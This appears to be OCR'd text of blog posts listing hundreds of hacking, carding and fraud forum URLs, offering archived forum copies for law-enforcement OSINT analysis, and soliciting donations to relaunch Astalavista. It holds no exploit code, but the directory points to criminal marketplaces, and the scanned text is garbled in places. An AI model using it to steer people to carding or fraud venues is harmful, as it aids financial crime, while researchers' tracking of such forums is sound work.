https://t0O0ls.net/ 
http://tolur.org/ 
http://upx8.com/ 
http://club.vfocus.net/ 
http://bbs.yunsuo.com.cn/ 
http://blacknet.forumi.biz/ 
http://soom.cz/ 
https://shellsec.pw/ 
https://0x00sec.org/ 
https://3rdworld.cc/ 
http://forum.3xp1r3.com/ 
http://accessroot.com/ 
http://accvip.net/ 
http://andhrahackers.com/ 
http://anthrax.cc/ 
http://antionline.com/ 
http://armyforum.xyz/ 
http://astalavista.com/ 
http://bedgehackersforum.runboard.com/ 
https://belegit.org/ 
http://binrev.com/ 


http://bitshacking.com/ 
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https://black-hat.net/ 
https://black-shades.net/ 
https://black-ships.net/ 
http://blackbay.org/ 
http://blackhat.community/ 
http://blackhatboard.com/ 
http://blackhatcorp.com/ 
https://forum.blackhatindia.ru/ 
http://blackhatmafia.com/ 
http://blackhatmoneymaker.com/ 
https://blackhatprotools.info/ 
http://blackhatscene.com/ 
http://blackservice.su/ 
http://blackstuff.name/ 
http://blacktrade.pro/ 
http://blackwebforum.net/ 
http://bpcsquad.su/ 
http://breachforums.com/ 
http://busyway.net/ 
http://byteforums.net/ 
https://carder.ws/ 
http://carderbase.su/ 
http://cardersbay.ru/ 
http://carderscave.ru/ 


http://carderx.com/ 
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http://carding.info/ 
http://cardinglegends.com/ 
http://cardingplanet.biz/ 
https://cardingteam.ws/ 
http://cardvilla.net/ 
https://cccp.is/ 
http://cclub.su/ 
http://cellphonehacks.com/ 
https://forum.chknet.cc/ 
https://club2crd.cc/ 
http://coderscentral.exofire.net/ 
http://coinodeal.com/ 
https://corelan.be/ 
http://corruptsecurity.net/ 
http://coverthacks.com/ 
https://cracked.to/ 
https://crackians.com/ 
http://cracking-vip.net/ 
http://crackingbase.cc/ 
http://crackingbase.eu/ 
https://crackingboxxx.com/ 
https://crackingcentral.com/ 
http://crackingfun.com/ 
https://crackinggods.net/ 


https://crackinghits.com/ 


7870 


http://crackinghome.com/ 
https://crackingking.com/ 
http://crackinglegend.pw/ 
http://crackingmob.com/ 
https://crackingparadox.com/ 
http://crackingpornpro.com/ 
http://crackingpremium.com/ 
http://crackingpro.com/ 
https://crackingsoul.com/ 
https://crackingspace.com/ 
https://crackingstation.com/ 
https://crck.io/ 
http://crdrmrkt.ws/ 
https://crimeclub.biz/ 
https://cdotws.pw/ 
https://cdotws.pw/ 
https://forum.cryptoworld.is/ 
http://forum.cstalking.com/ 
http://csws.tk/ 
http://cyber51.com/ 
http://cyberaffinity.com/ 
https://cyberarmy.|k/ 
http://cyberforums.net/ 
http://cyberhackers.org/ 


http://cybertechforum.com/ 
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http://cyberterrorists.net/ 
http://dangerforums.com/ 
https://darkarmy.in/ 
http://darkforums.com/ 
http://darkhack.com/ 
http://darknet.su/ 
http://darknetforums.com/ 
https://darkode.su/ 
https://darkpid.com/ 
http://darkpro.ws/ 
http://darkstuff.name/ 
http://datahacking.net/ 
http://demonforums.net/ 
http://desihacker.net/ 
http://dev-spam.com/ 
http://devil-group.com/ 
https://digitalgangster.com/ 
https://drhack.net/ 
http://drk.bz/ 
http://forum.ebookleaks.org/ 
http://eclipsion.com/ 
http://elitehackerz.net/ 
https://enclave.ac/ 
https://enigmagroup.org/ 


http://eon8.com/ 
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http://epichackers.net/ 


https://www.ethicalhacker.net/ 


http://ethicalhackingforum.com/ 


https://evilzone.org/ 
http://forum.exetools.com/ 
http://flowforums.com/ 
http://forumillegal.com/ 
http://fraud.ws/ 
https://fraudstercrew.in/ 


http://freebie-nation.org/ 


http://garage4hackers.com/ 


https://ghostforums.org/ 
https://globox. pw/ 
http://go4expert.com/ 
https://greysec.net/ 
http://gscentral.org/ 
https://gurusarenna.com/ 
http://hOrizon.net/ 
http://h4ck3r.in/ 
http://h4xforums.co.cc/ 
http://hack.org.za/ 
http://nackdatabase.com/ 
http://hacked.pro/ 
http://hacker.org/ 


http://hacker-world.com/ 
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http://hackerforum.globalfreeforum.com/ 
http://hackerstown.com/ 
http://hackerthreads.org/ 
http://hackerzhub.com/ 
http://nackforumt.com/ 
http://hackingbase.com/ 
http://hackingcash.com/ 
http://hackingforum.ru/ 
http://hackinggods.com/ 
http://hackingmafia.com/ 
http://hackingmind.com/ 
https://forum.hackinthebox.org/ 
https://hackrally.net/ 
http://www.hacksden.com/ 
http://hacksociety.net/ 
http://hacktalk.net/ 
https://www.hackthis.co.uk/ 
https://hackthissite.org/ 
http://forums.hak5.org/ 
https://nhakshack.net/ 
http://hellboundhackers.org/ 
http://hhfun.com/ 
http://forum.hitb.org/ 
https://ngcombo.com/ 


https://www.icOde.ws/ 
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http://iforum4u.com/ 
http://ilmedunya.com/ 
http://imsecure.org/ 
https://indiehackers.com/ 
https://infex.net/ 
http://infiniti-team.co.cc/ 
http://info-hack.com/ 
http://iosgods.com/ 
http://ircrash.com/ 
http://isectech.net/ 
http://kernelmode.info/ 
http://kleoz.net/ 
http://krime.club/ 
http://krimepays.cc/ 
http://kwickfix.org/ 
http://I33ts.org/ 
http://landzdown.com/ 
https://leakedbase.us/ 
http://leakedforums.com/ 
https://leaks.sx/ 
http://leetcoders.org/ 
http://leethacks.net/ 
http://leetupload.com/ 
https://libroot.com/ 


http://lightshed.ga/ 
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http://www. liquid-security.net/ 
http://majorhacking.com/ 
http://malwarecity.com/ 
http://manipulate.pro/ 
http://memoryhacking.com/ 
http://mmsecurity.net/ 
http://mohackz.com/ 
http://moneyflare.com/ 
https://most-security.com/ 
http://nethingoez.com/ 
http://nexh.pw/ 
http://ninja-security.com/ 
http://nulled.com.es/ 
https://www.nulledblog.com/ 
http://offensivecommunity.net/ 
https://ogforum.org/ 
http://openrce.org/ 
https://www.opensc.io/ 
http://pakhack.com/ 
http://pinoyhackingcommunity.org/ 
http://piratewarez.com/ 
http://plebleaks.com/ 
http://powerhex.com/ 
http://privatemarket.ws/ 


https://procarder.ru/ 
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https://prtship.com/ 
http://qpae.activeboard.com/ 
http://rOOtsecurity.org/ 
https://r4p3.net/ 
https://raidforums.com/ 
http://realcarders.us/ 
http://realhackerz.com/ 
http://reteam.org/ 
http://reversing.be/ 
http://rlpass.com/ 
https://rohitab.com/ 
http://romhacking.net/ 
https://rtn-team.cc/ 
https://runtime.rip/ 


http://ryan1918.com/ 


http://www.safeskyhacks.com/ 


https://sbhacker.net/ 
http://se-king.net/ 
https://forum.sec.army/ 
http://secret-zone.net/ 
http://206.214.216.12/ 
https://securityonline.info/ 
http://securityxploded.com/ 
http://seoblackhat.com/ 


https://shadowcarders.com/ 


7877 


https://sinfulsite.com/ 
http://sinister.ly/ 
https://siriusforum.com/ 
http://skidhacker.com/ 
http://smarthackerz.com/ 
https://smtpandexploit.com/ 
http://snd.astalavista.ms/ 
https://snipr.gg/ 
https://sociOpatx11.zone/ 
http://soldierx.com/ 
http://forum.sqliwiki.com/ 
https://stresserforums.me/ 
http://styxnet.pw/ 
http://team-rept.com/ 
http://teamxpc.com/ 
http://teraexe.com/ 
http://board.th3-Outl4ws.com/ 
http://thebotnet.com/ 
http://forum.thehackerwithin.com/ 
http://theworldisyours.biz/ 
http://thieves.co/ 
http://tiger-attack.forumotion.in/ 
http://tooolz-db.com/ 
http://topleakers.com/ 


https://www.totalblackhat.net/ 
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http://truehack.net/ 
https://tsrh.ws/ 
http://forum.tuts4you.com/ 
http://tuxedocrew.biz/ 
http://undergroundhacking.darkbb.com/ 
http://universalforums.co.cc/ 
http://forums.untangle.com/ 
https://usernames.org/ 
http://valld.cc/ 
http://vctools.net/ 
http://vendorsbay.club/ 
https://vigilante.tech/ 
http://viphackforums.net/ 
http://viprasys.org/ 
https://void.to/ 
http://forum.vxheavens.com/ 
http://waraxe.us/ 
http://wehave.info/ 
http://wilderssecurity.com/ 
http://woodmann.com/ 
http://worldofhacker.com/ 
http://forums.x-cult.org/ 
http://en.xakeroker.ws/ 
http://xtremeroot.net/ 


http://y-fighter.com/ 
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http://zentrixplus.net/ 
http://zero-security.org/ 
http://zillionere.com/ 
https://zyberph.com/ 
http://binwOrm.a.nf/ 
http://blackhack. xoo.it/ 
http://crack-wifi.com/ 
http://crystalmodding.net/ 
http://deus-byte-sec.rf.gd/ 
http://forumcrack.com/ 
http://fsateam.net/ 
http://hack-free.org/ 
http://nhackademics.fr/ 
https://forums.hackerzvoice.net/ 
http://hacking-security.free-h.net/ 
https://hackingcommunity.fr/ 
http://hackplaza.eu/ 
http://liberty-market.net/ 
http://loh.rf.gd/ 
http://meziamus.com/ 
https://n-pn.fr/ 
http://n1rvana.co.cc/ 
http://piratologie.pw/ 
http://root-me.org/ 


http://sploit96-node.rf.gd/ 
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http://srabb3r-node.rf.gd/ 
http://ultuifii.info/ 
https://w3challs.com/ 
http://world-dev.com/ 
http://forum.zenk-security.com/ 
http://atghc.net/ 
http://forum.cybsecgroup.com/ 
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http://nackerforum.globalfreeforum.com/ 
http://italiancrack.com/ 
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16.5.5 Cybercrime Forum Data Set - 2019 - Free Download! (2020-07-17 15:09) 


<parent> Darkmoney iHonker ShadowMarket 
11Wang DarkWeb LinkFeed SkyFraud 
365Exe DomenForum Linuxac.org Spyhackerz 
419eater Eviloctal Master-X Svuit.vn 
4HatDay Exelab MasterWebs Szenebox 
aHack Forum-UINSell MaulTalk Szuwi 
Aljyyosh Forum.Zloy bz Mmpg.ru Tenebris 
Antichat.ru ForumSape = Mr11-11mr.7olm.org TheBot 
ArmadaBoard ForumSEO Nullnoss.org Toolbabase.se 
BigF ozzy Free-hack pay-per-install_org TotalBlackhat 
BlackhatWorld ghostmarket.net PhreakerPro Turkhackteam 
BPCForum Gla.vn Piratebuhta.pw Vsehobby 
Cardvilla GoFuckBiz ProCrd Webmasters.ru 
Chf gofuckbiz.com ProLogic Whitehat.vn 
CNHonker H4kurd.com Promarket WWH-Club 
CNSec Hack-Port ProxyBase www.opensc.ws 
Crack-Forum Hackersoft scamwarners Xakep.bg 
Cracked.to Hackingboard SEOCafe Xakepok 
Cyberizm Hackings SEOForum Zismo 
Darkmarket.la iFud 


Dear blog readers, 


| wanted to take the time and effort and let you know that I’ve decided to make the cy- 
bercrime forum data set part of my Law Enforcement and OSINT analysis operation "[1]Uncle 
George" publicly accessible for free with the idea to solicit more participants in the ongoing 
law enforcement and OSINT operation "[2]Uncle George" with the idea to crowd-source the 
actual enrichment process potentially reaching out to the security industry the U.S Intelligence 
Community and U.S Law Enforcement on its way to track down shut down and prosecute the 
individuals behind these campaigns. 


Grab a direct download copy of the entire Cybercrime Forum Data Set from [3]here. 


Recommended posts: 
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¢ [4]JExposing the Modern Cybercrime Ecosystem - A Compilation 
Cyberfrime-Friendly Forum Communities 


¢ [5]Exposing the Modern Cybercrime Ecosystem - A Compilation 
Cyberfrime-Friendly Forum Communities - Part One 


¢ [6]Exposing the Modern Cybercrime Ecosystem - A Compilation 
Cyberfrime-Friendly Forum Communities - Part Two 


¢ [7]Exposing the Modern Cybercrime Ecosystem - A Compilation 
Cyberfrime-Friendly Forum Communities - Part Three 


¢ [8]Exposing the Modern Cybercrime Ecosystem - A Compilation 
Cyberfrime-Friendly Forum Communities - Part Four 


Here’s a separate list of entire offline copies of cybercrime-friendly 
currently pending analysis and enrichment: 


¢ [9]evilhack.ru.rar 

¢ [10]gerki.pw.rar 

e [11]ProLogic.rar 

¢ [12]SEOForum.rar 

¢ [13]c-cracking.org.rar 
¢ [14]Whitehat.vn.rar 

¢ [15]neadekvat.ru.rar 
¢ [16]www.opensc.ws.rar 
¢ [17]gofuckbiz.com.rar 
¢ [18]Darkode.rar 

¢ [19]hackademics.fr.rar 
¢ [20]darkmoney.de.rar 
¢ [21]xaker.name.rar 

¢ [22]Xakep.bg.rar 

¢ [23]sysadmins.ru.rar 


¢ [24]PhreakerPro.rar 


of Currently Active 


of Currently Active 


of Currently Active 


of Currently Active 


of Currently Active 


forum communities 
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¢ [25]Master-X.rar 

¢ [26]Chf.rar 

¢ [27]Darkmarket.la.rar 

¢ [28]Webmasters.ru.rar 

¢ [29]reversing.cc.rar 

¢ [30]monopoly.ms.rar 

¢ [31]Exelab.rar 

¢ [32]blacktip.top.rar 

¢ [33]ghostmarket.net.rar 
¢ [34]DomenForum.rar 

¢ [35]Antichat.ru.rar 

¢ [36]Hack-Port.rar 

¢ [37]ProxyBase.rar 

¢ [38]replace.org.ua.rar 

¢ [39]Eviloctal.rar 

¢ [40]Xakepok.rar 

¢ [41]WWH-Club.rar 

¢ [42]Szuwi.rar 

¢ [43]GoFuckBiz.rar 

¢ [44]www.forohack.com.rar 
¢ [45]Promarket.rar 

¢ [46]pay-per-install.org.rar 
¢ [47]LinkFeed.rar 

¢ [48]TotalBlackhat.rar 

¢ [49]Mr11-11mr.7olm.org.rar 
¢ [50]iFud.rar 

¢ [51]Piratebuhta.pw.rar 

¢ [52]BPCForum.rar 

¢ [53]ForumSEO.rar 

¢ [54]Cracked.to.rar 


¢ [55]Forum.Zloy.bz.rar 
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[56]ProCrd.rar 
[57]Crack-Forum.rar 
[58]alligator.cash.rar 
[59]Mmpg.ru.rar 
[60]MaulTalk.rar 
[61]ForumSape.rar 
[62]SEOCafe.rar 
[63]dwh.su.rar 
[64]BigFozzy.rar 
[65]Gla.vn.rar 
[66]Zismo.rar 

[67 ]it-24h.com.rar 
[68]Forum-UINSell.rar 
[69]carderplanet.rar 
[70]4HatDay.rar 
[71]Toolbabase.se.rar 
[72 ]ubotstudio.com.rar 
[73]aHack.rar 
[74]Linuxac.org.rar 
[75]imhatimi.org.rar 
[76]Svuit.vn.rar 
[77]Free-hack.rar 
[78]xaknet.org.rar 
[79]www.ryan1918.com.rar 
[80]Darkmoney.rar 
[81]shadowcrew-2.rar 
[82]Hackersoft.rar 
[83]BlackhatWorld.rar 
[84]Nullnoss.org.rar 
[85]365Exe.rar 


[86]Aljyyosh.rar 
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¢ [87]forum.cybsecgroup.com.rar 
¢ [88]Hackingboard.rar 

* [89]Szenebox.rar 

¢ [90]Cardvilla.rar 

¢ [91]iHonker.rar 

¢ [92]SkyFraud.rar 

¢ [93]H4kurd.com.rar 

¢ [94]moneymaker.hk.rar 

¢ [95]CNSec.rar 

¢ [96]Cyberizm.rar 

¢ [97]Turkhackteam.rar 

¢ [98]forum.reverse4you.org.rar 
¢ [99]CNHonker.rar 

¢ [100]security-teams.net.rar 
¢ [101 ]itsobr.com.rar 

¢ [102]Spyhackerz.rar 

¢ [103]ArmadaBoard.rar 

¢ [104 ]iransec.net.rar 

¢ [105]xaker26.info.rar 

¢ [106]11Wang.rar 

¢ [107]Hackings.rar 


Drop me a line at dancho.danchev@hush.com in case you’re interested in sharing the results 
of your data mining and enrichment process activities and I'll be shortly looking forward 
to featuring them in terms of communicating your findings to my audience which includes 
vendors organizations the U.S Intelligence Community and U.S Law Enfocement. 


Stay tuned! 


https ://ddanchev. blogspot .com/2019/10/announcing- law-enforcement-and-osint .htm 
ttps://ddanchev. blogspot. com/2019/12/announcing-1law-enforcement-and-osint .htm 


https ://ddanchev. blogspot .com/2020/07/exposing-modern-cybercrime-ecosystem. htm 
ttps://ddanchev. blogspot .com/2020/07/exposing-modern-cybercrime-ecosystem_0.htm. 
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16.6 August 


16.6.1 Cyber Security Project Investment Proposal - Astalavista Security Group - Of- 
ficial Re-Launch - Support me Today! (2020-08-28 12:28) 


[1] 


Dear blog readers, | wanted to take the time and effort and present a currently active cyber 
security project proposal with you for the purpose of soliciting your feedback including possible 
project donations using my PayPal ID: dancho.danchev@hush.com 


Long story short - I’ve spend the last couple of months doing active Security Industry 
and Security Community outreach for the purpose of soliciting possible funding including 
feedback and operational activity type of support for the project - which is basically [2]my 
old working place circa the 90’s - Astalavista Security Group - where I’ve recently received 
a direct proposal to acquire run and manage and actually re-launch and re-surrect the portal 
the way we know it -The World’s Most Popular Information Security Portal also known as the 
Underground. 
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[3] 


As it’s been a while since I’ve been full-time employed meaning | don’t currently posses the 
necessary funds to actually take care of the legal fees including the actual re-launch and 
introduction including implementation of new services - | decided to post this cyber security 
project proposal with the idea to seek everyone's assistance for the purpose of donating using 
my PayPal ID: dancho.danchev@hush.com which I'll use to actually finance and run the portal 
within the next couple of months with official launch eventually scheduled for January 1st 
2020. 


What we currently need? Basically what | need is your financial support including possi- 
ble operational activity support in the form of anything that you could possibly offer for the 
purpose of re-surrecting and re-launching the portal. 


Consider going through the cyber security project proposal and approach me at - dan- 
cho.danchev@hush.com for a possible donation using PayPal. 


[4] 
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Welcome to the Wonderful Future of Information Security! 


In a World dominated by technological innovation and inter-connected devices - the World’s 
leading expert (http://ddanchev.blogspot.com) in the field of cybercrime research security 
blogging and Threat Intelligence gathering is proud to present the upcoming availability of 
a ubiquitous hacker and security-expert-friendly loT (Internet of Things) device empowering 
Astalavista Security Group - The Underground 2.0 - The World’s Most Popular Information 
Security Portal empowering Europe’s oldest running and most popular Hacking and Security 
Company with the general availability of the Astalavista Security Group - The Underground 
2.0 lol device envisioned to be shipped to every home and every house internationally 
empowering a new and future generation of Hackers and Security Experts within a period of 
six months service the needs of millions of loyal users globally. 
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Astalavista Security Group - The Underground Security Lab Circa 2006: 


[5] 


The main purpose behind this campaign is to raise the necessary funds for the initial 
launch of the project including the first stage of the project which will consist of active Security 
Community operation and launch that would later on mature into a SaaS (Software-as-a- 
Service) type of ubiquitous loT (Internet of Things) device shipped to millions of users globally 
empowering a new and future generation of Hackers and Security Experts. 


CEO and Managing Director - Dancho Danchev - Presenting on the "Exposing Koobface - 
The World’s Largest Botnet": 


[6] 
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Personal Message 


Dear Community, 


My name is Dancho Danchev (http://ddanchev.blogspot.com) and | represent the World’s 
Largest and Most Popular Information Security Portal where | used to act as a Manag- 
ing Director throughout 2003-2006 where | was responsible for daily Security News and 
Security Directory moderation and content management including advertising inventory 
including the launch and maintenance of a highly popular monthly Security Newsletter 
(https://packetstormsecurity.com/groups/astalavista/) with thousands of subscribers across 
the globe featuring exclusive Security Interviews with people from the Scene including Security 
News Security Articles and Security Directory submission type of content and | wanted to 
reach out to the Community with the idea to seek your assistance and future help in the 
upcoming launch of the portal. 
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PayPal 


[7] 


The main purpose behind this campaign is to raise the necessary funds from the Community 
for the purpose of ensuring a proper and smooth launch that would eventually position the 
company and the project as the World’s Most Popular Information Security Portal including 
daily campaign updates and real-time notifications of new features and company and project 
service and product. 


The campaign will issue daily updates with fresh news directly from the Security Lab for 
the purpose of ensuring that the Community and possible backers remain on the top of the 
campaign updates allowing the Community and possible backers with the opportunity to direct 
their questions and possible feedback to the company CEO and acting Managing Director - 
Dancho Danchev. 


[8] 
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https://Inkd.in/eGYu63x #intelligencecommunity #security #cyberwarfare 
#cyberthreat #cyberattack #cybercrime #cyberdefense #informationsecurity 
#cyber #cybersecurity #cyberattacks #malware #research #securities 
#cyberoperations #cybercrimeinvestigation #cyberspace #malwareanalysis 
#cybercriminal #cybercrimes #cyberwar #botnet #botnets #cybercriminals 
#cyberthreats #donations 


Astalavista Security 2.0 - A Hacker in Every Home 


The primary contact points for this campaign are my _ personal email - dan- 
cho.danchev@hush.com and the following direct Skype chat and video conversation - 
[9]https://join.skype.com/invite/cfsgmBfNdeYb where you can connect with me at any time 
for the purpose of this campaign including general feedback questions and possible features 
and inquiries requests. 


[10] 
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FUNDING 
Astalavista Security Group - The Underground 2.0 ° 


—e Astalavista Security 2.0 - A Hacker 
in Every Home 


o== 


$o 


BACK IT 


| sincerely thank you for your time to go through this campaign proposal and | look for- 
ward to begin working with you. 


Sincerely Yours, 


Dancho Danchev 


http://ddanchev.blogspot.com 


Astalavista Security Group - loT (Internet of Things) Revolution - A Hacker and a Secu- 
rity Expert in Every Home - Prototype Stage - Stay Tuned for Related Updates on Product 
Concept Production and General Availability 


Related loT Device Specifications and Related Product Images: 
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Related loT Device Specifications and Related Product Images: 


[12] 
CompuLab's latest ARM Industrial computer 


@— NXP i.MX7 ARM 2x GbE, 4x USB. 
‘a (im}) ' 
‘er Cortex-A7 processor (D) RS485 and RS232 


Cy) 3G/LTE modem, WiFi, pa Rugged, aluminum 
BT 4.1 and ZigBee miniature housing 


7909 


Related loT Device Specifications and Related Product Images: 


Related loT Device Specifications and Related Product Images: 


[14] 


Related loT Device Specifications and Related Product Images: 


[15] 
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Cellular / 2" GbE 1+ POE RS485 WLAN+BT 
WLAN antenna Antenna 


Related loT Device Specifications and Related Product Images: 


[16] 


Sample Screnshots of the Secure Anti Forensic Anonymous Operating System That We Indent 
to Use: 


[17] 
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What we need in terms of this project? 


¢ We’re currently seeking your financial support in terms of this crowd-funding project for 
the purpose of this re-surrecting and re-lauching the portal 


¢ We’re currently seeking a possible Investor and Project Adviser including VIP Signup in- 
cluding People in the following Staff Categories. Do you think you can help? Approach me 
today at dancho.danchev@hush.com to discuss your possible involvement in the project 
in terms of Staff Members and possible cooperation 


¢ Help us spread the word - the firs thing that we need is for you to ask your friends and 
colleagues to go through this Crowd-Funding campaign and possibly donate including to 
share the link with fellow colleagues and friends. 


[18] 
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The Astalavista Security Group Crowd-Funding Project Timeline - Key Summary Points in 
Chronological Order 


¢ Official Crowd-Funding campaign launch 


¢ Reaching out to friends and colleagues on LinkedIn and Twitter including personal contacts 


¢ Daily News from the Security Lab in terms of the campaign and how the money received 
will go for re-surrecting and actually re-launching of the portal 


Live YouTube Broadcast with CEO and Managing Director - Dancho Danchev - for the pur- 
pose of introducing the project and what exactly we’re trying to achieve in terms of the 
crowd-funding campaign 


Sample Proposed Implementation of a bult-in Honeypot on the actual loT device to be 
shipped to hundreds of thousands of users globally through the use of Honeytoken-based 
"Fake Cyber Artifacts": 
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[19] 


How we’re going to use the money? 


The following is a brief estimate on how we’re going to use the initial $50,000 as re- 
quested by my blog readers: 


¢ $4,000 - Legal Fees 
¢ $1,000 - Travel 


¢ $10,000 - SaaS Platform 
7914 


$10,000 - Secure OS Development 


$5,000 - Marketing 
¢ $10,000 - Product Inventory 


$10,000 - Miscellaneous Including Shipping and Official Launch 


What is Astalavista Security Group - The Underground 2.0? 


Astalavista.com - The Underground, is one of the world’s most popular and comprehen- 
sive computer security web sites. Astalavista.com was originally founded in 1997, by a hacker 
computer enthusiast. Since then, the site became the underground’s most respected and 
well maintained portal for anything you ever wanted to know about hacking and cracking.The 
enormous database, the constant updates, the unique nature of the content published, the 
new services and features, all offered for free, turned Astalavista.com into what it is today - a 
cult! 


Mission Statement and Company Vision 


Company Mission - "Jo manage launch and operate the World’s Largest and Most Vibrant 
Hacking and Security Community empowering millions of users globally with the necessary 
data information and knowledge to stay ahead of current and emerging threats". 


Company Vision - "Jo become the The World’s largest security and hacking SaaS innova- 
tion and business development enabler successfully serving the needs of millions of loyal 
users across the globe - A Hacker and a Security Expert in Every Home". 


Key Facts About The Company and the Project 


¢ Europe’s Oldest Running and Most Popular Hacking and Security Brand 


¢ Ubiquitous loT device in every house and every home running the proprietary and secure 
Astalavista OS featuring exclusive in-house and in-home access to the Premium and Pro- 
prietary Astalavista Security Group 2.0 API-based SaaS platform featuring unique access 
to the World’s Most Vibrant and Largest Hacking and Security Platform 


¢ A hacker and a security expert in every house and every home 
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¢ APl-based self-sufficient cyber and unique branded hacking and security economy 


Millions of loyal users converted to loyal home and house users and experts 
¢ The World’s Largest and Most Vibrant Hacking and Security Economy 


¢ Millions of security and hacking downloads 


Millions of security and hacking video downloads 


e Millions of security and hacking book downloads 


Millions of security and hacking podcast downloads 


Sample Portal Statistics Throughout the Years: 


[20] 


[21] 
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[22] 


100.00% Organic 
Top 5 Organic keywords 
Out of 14: ® 
astalavista 54.29% 
astalavista.com 25.43% 


WWW.aStala Vista.co... 15.82% 


astlavesta 4.46% 


[23] 
® Global Rank ©) @ country Rank © Lj Category Rank ©) 


Worldwide Germany Computer and Electronics # 


* lp lat oe mate ho] 0 pote) 0 HSL poe 


[24] 


10.45% 
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[28] 


1930 0s 205 795 
472 399 363 3.30 318 225 2.90 168 192 151 


[29] 


Sample Security Search Engine that we’re currently working on: 
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Project History - Astalavista 2.0 Throughout The Years 
Interview with a core founder of Astalavista.com 


Dancho: Hi Prozac, Astalavista.com - the underground has been one of the most popu- 
lar and well known hacking/security/cracks related web site in the world since 1997. How did 
it all start? What was the idea behind it? 


Prozac: Basically, it was me and a college friend that started Astalavista.com during our 
student years. The name of the site came from the movie Terminator 2 from Schwarzeneg- 
ger’s line " Hasta la vista Baby"! Back in those days there weren’t many qualified security 
related web sites, and we spotted a good opportunity to develop something unique, which 
quickly turned into one of the most popular hacking/security sites around the globe. In the 
beginning, it was just our Underground Search List, the most comprehensive and up-to-date 
search list of underground and security related web sites, based on what we define as a quality 
site. Then we started providing direct search opportunities and started developing the rest 
of the site. Many people think we did some serious brainstorming before starting Astalavista, 
well, we did, but we hadn’t expected it to become such a popular and well known site, which 
is the perfect moment to say thanks to all of you who made us as popular as we’re today. 


Dancho: Astalavista.com always provides up to date, sometimes "underground" docu- 
ments/programs. The Security Directory is growing daily as well, and it has been like this for 
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the past several years. How do you manage to keep such an archive always online, and up to 
date? 


Prozac: Astalavista’s team members are aware of what’s "hot" and what’s interesting 
for our visitors, just because we pay an enormous attention to their requests for security 
knowledge, and try to maintain a certain standard, only quality files. While we add files 
every day, a large number of those are submitted by our visitors themselves, who find their 
programs and papers highly valued at our site, as we give them the opportunity to see how 
many people have downloaded their stuff. 


Dancho: Astalavista occupies people’s minds as the underground search engine. But 
what is Astalavista.com all about? 


Prozac: The majority of people still think Astalavista.com is a Crack web site, which is 
NOT true at all. Astalavista.com is about spreading secutity knowledge, about providing 
professionals with what they’re looking for, about educating the average Internet user on 
various security issues; basically we try to create a very well segmented portal where ev- 
eryone will be able to find his/her place. We realize the fact that we’re visited by novice, 
advanced and highly advanced users, even government bodies; that’s why we try to satisfy 
everyone with the files and resources we have and help everyone find precious information 
at astalavista.com. Although we sometimes list public files, the exposure they get through 
our site is always impressing for the author, while on the other hand, some of the files that 
are listed at Astalavista.com sometimes appear for the first time at our site. We try not to 
emphasize on the number of files, but on their quality and uniqueness. 


Dancho: Everyone knows Astalavista, and sooner or later everyone visits the site. How 
did the image of Asta become so well-known around the world? 


Prozac: Indeed, we are getting more and more visitors every month, even from coun- 
tries we didn’t expect. What we think is important is the quality of the site, the lack of porn, 
the pure knowledge provided in the most professional and useful way, the free nature of the 
site, created "for the people", instead of getting it as commercial as possible. Yes, we work 
with a large number of advertisers, however, we believe to have come to a model where 
everyone’s happy, advertisers for getting what they’re paying for, and users for not being 
attacked by adware or spyware or a large number of banners. 


Dancho: A question everyone's asking all the time - is Astalavista.com illegal? 
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Prozac: No! And this is an endless debate which can be compared to the Full Disclo- 
sure one. We live in the 21st century, a single file can be made public in a matter of seconds, 
then it’s up to the whole world to decide what to do with the information inside. We’re often 
blamed because we’re too popular and the files get too much exposure. We’re often blamed 
for serving these files to script-kiddies etc. Following these thoughts, | think we might also 
ask, is Google illegal, or is Google’s cache illegal?! Yes, we might publish certain files, but 
we'll never publish "The Complete Novice Users on HOWTO ShutDown the Internet using 20 
lines VB code". And no, we don’t host any cracks or warez files, and will never do. 


Dancho: Such a popular security site should establish a level of social responsibility - 
given the fact how popular it is among the world, are you aware of this fact, or basically it’s 
just your mission that guides you? 


Prozac: We're aware of this fact, and we keep it in mind when approving or adding new 
content to the site. We also realize that we still get a large number of "first time visitors", 
some of them highly unaware of what the security world is all about; and we try to edu- 
cate them as well. And no, we’re not tempted by "advertising agencies" eager to place 
adware/spyware at the site, or users submitting backdoored files, and we have a Strict policy 
on how to deal with those - "you’re not welcome at the site"! 


Dancho: We saw a completely new and "too professional to be true" Astalavista.com 
since the beginning of 2004 - what made you renovate the whole site, and its mission to a 
certain extend? 


Prozac: It was time to change our mission in order to keep ourselves alive, and most 
importantly, increase the number and quality of our visitors, and we did so by finding several 
more people joining the Astalavista.com team, closely working together to improve and 
popularize the site. We no longer want to be defined as script kiddies paradise, but as a 
respected security portal with its own viewpoint in the security world. 


Dancho: What should we expect from Astalavista.com in the near future? 


Prozac: To put it in two words - changes and improvements. We seek quality and inno- 
vation, and have in mind that these developed by us, have an impact on a large number of 
people - you, our visitors. Namely because of you we’re devoted to continue to develop the 
site, and increase the number of services offered for free, while on the other hand provide 
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those having some sort of purchasing power and trusting us with more quality services and 
products. 


Dancho: Thanks for the chat! 


Prozac: You’re more than welcome :) 


A Brief Introduction to the History of the Scene Through the Prism of CEO and Manag- 
ing Director - Dancho Danchev - The Maniac - circa the 90’s 


[32] 
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The Scene we know it back in the 90’s was primarily consisting of several high profile 
security and hacking Web site portals including astalavista including several high Profile 
Top Links Lists for hacking and security Web sites including a countless number of personal 
hacking and security projects courtesy of users across the globe. Privacy did not exist as 
terms that would raise someone’s eye-brows and Security and Hacking was a free spirit topic 
to which the CEO and acting Managing Director - Dancho Danchev - throughout the 90’s used 
to spent a decent portion of his time going through Security and Hacking manuals documents 
and text files including the experimentation with various Security and Hacking tools including 
ICQ flooders, Nuke Bombers and trojan horses leading him to pursue a career as a member of 
a variety of Security and Hacking groups including a successful career as a Technical Collector 
of trojan horses with the market leading anti-trojan software at the time - Trojan Defense Suite 
and LockDownCorp’s LockDown2000 anti-trojan software throughout the 90’s. 


Trojan Information Database courtesy of CEO and Managing Director - Dancho Danchev 
- exclusively created and developed for Trojan Defense Suite: 
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Database Viewer Copyright © 1999, Diamond Computer Systems Pty.Ltd. ~ Information Copyright © 1999, Dancho Danchev (dancho@mbox.digsys.bg) 


Security and Hacking Newsletter courtesy of CEO and Managing Director - Dancho Danchev - 
The Maniac - circa the 90’s - exclusively developed for Blackcode Ravers: 
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-={ Blackcode Ravers Magazine Issue 2 }=- 
Home page : http://www. blackcode. com 
Editor of the magazine: tHe mAniAc 
themani ac@blackcode. com 


Table of Contents: 


L.Editorial 

2.Mirrors of the magazine 

3.Latest News With Blackcode Ravers 
4.How to break your school security 
5.About Virii 

5.Advertising 

7.Trojans Section 

